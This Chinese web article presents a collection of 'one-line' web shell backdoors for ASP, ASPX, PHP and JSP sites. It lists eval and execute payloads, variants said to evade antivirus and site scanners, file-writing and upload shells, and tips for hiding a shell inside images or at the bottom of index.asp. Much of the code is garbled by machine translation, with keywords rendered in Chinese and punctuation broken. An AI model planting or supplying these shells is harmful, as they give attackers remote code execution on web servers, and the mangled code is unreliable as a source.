在互联网发达的今天，各种水平的程序用应时而生，不注重安全，导致很多网站都被挂马，这样的一句话后门是黑客最喜欢的，隐藏性好，这里将代码分享给大家，大家可以通过查找工具查找替换

% Eval Request(' c ')% % execute Request(' c ')% % execute(Request(' c ')% % global Request(' sb ')% % Eval(Request(chr(35)))% % if Request(' c '))" then session(' c ')=Request(' c '):end if:if session(' c ')" " then执行session(' c ')% % Eval(Request .Item['c']，' unsafe ')；% '备份专用% eval(request(' c ')):响应。结束% '无防下载表，有防下载表突破专用一句话% execute request(' c ')% % % loop % % % loop % % % execute request(' c ')% % execute request(' c ')% loop % % '防杀防扫专用% if Request(' c ')' '然后执行global(Request(' c ')% '不用，' script Language=VBScript runat=服务器执行请求(' c ')/script % @ Language=' JavaScript '代码页=' 65001 ' var lcx={ '名字：Request.form('# ')，'性别：eval，'年龄':'18','昵称':'请叫我一声老大'};lcx .性别((lcx .名字)' ')% script language=VBS runat=服务器eval(request(' c ')/script script language=VBS runat=服务器eval _ r(request(' c ')/script '不用双引号评估百分比请求(chr(35))% '可以躲过雷客图%set ms=server .CreateObject('MSScriptControl .脚本控制。1’)ms . Language=' VBScript ' ms . add object ' response '，response ms.AddObject

' request '，request ms . execute语句(' ev ' ' al(request(' c ' '))')% % dy=request(' dy ')% % Eval(dy)% '容错代码如果请求(' sb ')' '然后执行全局请求(' sb ')结束if PHP一句话复制代码代码如下：PHP eval($ _ post 1)；PHP if(isset($ _ POST[' c ']){ eval($ _ POST[' c '])；}?服务器端编程语言（Professional Hypertext Preprocessor的缩写）系统($ _ request 1)；php ($_=@$_GET1).@$_($_POST1)？php eval_r($_POST1)？php @eval_r($_POST1)？//容错代码？PHP assert($ _ post 1)；//使用兰克一句话客户端的专家模式执行相关的服务器端编程语言(专业超文本预处理器的缩写)语句？$ _ POST[' c ']($ _ POST[' cc '])；$_POST['c']($_POST['cc']，$_POST['cc'])？php @preg_replace('/[email]/e '，$_POST['h']，' error ')；/*使用这个后，使用菜刀一句话客户端在配置连接的时候在'配置'一栏输入*/:Oh=@ eval _ r($ _ post 1)；/O？php echo `$_GET['r']`？//绕过？限制的一句话script language=' PHP ' @ eval _ r($ _ POST[sb])/script JSP一句话复制代码代码如下：%if(request.getParameter('f ')！=null)(新Java。io。文件输出流(应用程序。获取real path(“\”)请求。getparameter(' f ').write (request.getParameter('t ').getBytes())；% 提交客户端' form action=' ' method=' post ' textarename=' t '/textarea br/input type=' submit ' value='提交/来自ASPX一句话脚本语言=' c# ' runat=' server ' web admin 2y。x . y a=新网站管理员2y。x . y(' add 6 bb 58 e 139 be 10 ')/script

再补充几个：

推荐还是把一句话加进图片里面去。普通的服务器端编程语言(专业超文本预处理器的缩写)一句话：PHP @ eval($ _ POST[' r00ts '])；普通的白杨一句话：%eval(请求. Item['r00ts']，"不安全");% aspx突破一流的：[code]dim da set FSO=服务器。createobject('脚本。文件系统对象')path=request(' path ')if path lt；gt；' '那么数据=请求(' da ')设置da=FSO。创建文本文件。如果err=0，则响应，写入数据。写"是",否则回答呃。如果设置da=nothing设置fos=nothing响应，则清除end .写“lt；form action=' method=postgt回应。写“lt；输入类型=文本名称=路径gt .回应。写“lt；brgt回应。"写"当前文件路径：' ampserver。mappath(请求。服务器变量('脚本名称'))响应。写“lt；brgt回应。"写"操作系统为：'安培请求服务器变量(“OS”)响应。写“lt；brgt回应。写网服务器版本为：'安培请求服务器变量(“服务器_软件”)响应。写“lt；brgt回应。写“lt；textarea name=da cols=50 rows=10 width=30gt；lt；/textareagt .回应。写“lt；brgt回应。写“lt；输入类型=提交值=保存gt .回应。写“lt；/formgt .lt；/Scriptgt .动态服务器页面一句话：% if Request(" 1 ")"然后执行global(Request(" 1 ") %

PHP反杀反扫一句话：php (])？上面这句话是反杀反扫！网上很少有人用！它可以无误地插入网页上任何一个ASP文件的底部，比如index.asp！

因为加了判断！带判断的PHP的句子和上面ASP的句子是一样的，可以插在任何PHP文件的底部，不会出错！if(isset($ _ POST[' 1 ']){ eval($ _ POST[' 1 '])；}?php系统($ _ REQUEST[1])；

没有防下载表，但是有防下载表尝试插入以下语句% executerequest(" class ")% % ' % loop % % % executerequest(" class ")% % executerequest(" class ")' % % loop % %

备份专用% eval(request(" 1 ")):response . end %

Asp句子% execute (request ("1"))% aspx句子：script runat=" server " web admin 2y . x . y aaaaaa=new web admin 2y . x . y(" add 6 bb 58 e 139 be 10 ")；/脚本

雷克图的一句话你可以避而不谈。%set ms=server。CreateObject("MSScriptControl。script control . 1 ") ms . Language=" VBScript " ms . add object " Response "，Responsems。添加对象“请求”，requestms。execute statement(" ev " " al(request(" " 1 "))" %

asp语句脚本runat=服务器执行请求(" 1 ")/不带'，'的脚本

没有双引号的句子。%评估请求(chr(35))%

郑重声明：本文由网友发布，不代表盛行IT的观点，版权归原作者所有，仅为传播更多信息之目的，如有侵权请联系，我们将第一时间修改或删除，多谢。